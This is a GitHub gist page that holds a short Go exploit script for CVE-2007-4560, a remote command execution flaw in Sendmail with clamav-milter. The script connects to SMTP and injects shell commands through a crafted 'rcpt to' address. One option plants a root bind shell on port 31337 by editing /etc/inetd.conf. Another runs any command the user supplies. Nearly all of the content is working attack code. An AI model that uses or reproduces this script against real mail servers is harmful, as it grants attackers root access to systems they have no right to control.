Skip to content

Instantly share code, notes, and snippets.

@0xjbb
Last active March 10, 2021 20:09
Show Gist options
  • Save 0xjbb/fdf1678addf0c957bf2b284b29e4dff4 to your computer and use it in GitHub Desktop.
Save 0xjbb/fdf1678addf0c957bf2b284b29e4dff4 to your computer and use it in GitHub Desktop.
[GO] ClamAV Milter Remote Code Execution [CVE-2007-4560]
package main
// Sendmail w/ clamav-milter Remote Root Exploit
// 'CVE-2007-4560'
// coded by https://github.com/0xjbb :)
// go run exploit.go -h 192.168.109.42 -p 25 -c "ping -c 5 192.168.49.109"
import (
"flag"
"log"
"net"
)
func main(){
ip := flag.String("h", "", "Ip Address")
port := flag.String("p", "25", "Port")
bind := flag.Bool("b", false, "Spawn bind shell on target")
cmd := flag.String("c", "", "Use Command instead of bind shell")
flag.Parse()
conn, err := net.Dial("tcp", *ip + ":" + *port)
if err != nil{
log.Fatal("Connection error: ", err)
}
conn.Write([]byte("helo you\r\n"))
conn.Write([]byte("mail from: <>\r\n"))
if *bind {
conn.Write([]byte("rcpt to: <nobody+\"|echo '31337 stream tcp nowait root /bin/sh -i' >> /etc/inetd.conf\"@localhost>\r\n"))
conn.Write([]byte("rcpt to: <nobody+\"|/etc/init.d/inetd restart\"@localhost>\r\n"))
}else{
conn.Write([]byte("rcpt to: <nobody+\"|" + *cmd +"\"@localhost>\r\n"))
}
conn.Write([]byte("data\r\n.\r\nquit\r\n"))
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment